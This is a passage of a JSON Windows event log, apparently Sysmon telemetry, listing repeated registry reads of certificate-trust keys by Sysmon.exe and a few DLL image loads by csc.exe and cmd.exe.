"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862460000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 
131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862610000, 
- "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862610000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - 
"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - 
"timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\SysWOW64\\imm32.dll", - 
"pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "image_load", - "image_name": "version.dll", - "image_path": "C:\\Windows\\SysWOW64\\version.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\SysWOW64\\kernel.appcore.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "image_load", - "image_name": "apphelp.dll", - "image_path": "C:\\Windows\\System32\\apphelp.dll", - "pid": 6712, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 